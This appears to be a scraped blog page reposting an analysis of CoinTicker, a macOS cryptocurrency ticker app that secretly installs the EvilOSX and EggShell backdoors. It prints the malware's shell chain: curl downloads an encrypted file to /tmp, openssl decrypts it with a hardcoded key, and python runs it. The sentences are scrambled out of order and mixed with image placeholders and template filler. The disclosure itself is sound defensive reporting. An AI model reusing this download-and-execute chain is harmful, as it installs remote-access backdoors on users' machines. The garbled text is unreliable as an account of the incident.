![]() ![]() Nohup curl -k -L -o /tmp/.info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.py The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS: When launched, however, the app downloads and installs components of two different open-source backdoors: EvilOSX and EggShell. ![]() Without any signs of trouble, such as requests for authentication to root, there's nothing to suggest to the user that anything is wrong. The app's preferences allow the user to customize the display, showing information about a wide variety of cryptocurrencies, including Bitcoin, Etherium, and Monero.Īlthough this functionality seems to be legitimate, the app is actually up to no good in the background, unbeknownst to the user. Once downloaded, the app displays an icon in the menu bar that gives information about the current price of Bitcoin. ![]() ![]() The CoinTicker app, on the surface, appears to be a legitimate application that could potentially be useful to someone who has invested in cryptocurrencies. It seems that the app is covertly installing not just one but two different backdoors. An astute contributor to our forums going by the handle 1vladimir noticed that an app named CoinTicker was exhibiting some fishy behavior over the weekend. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |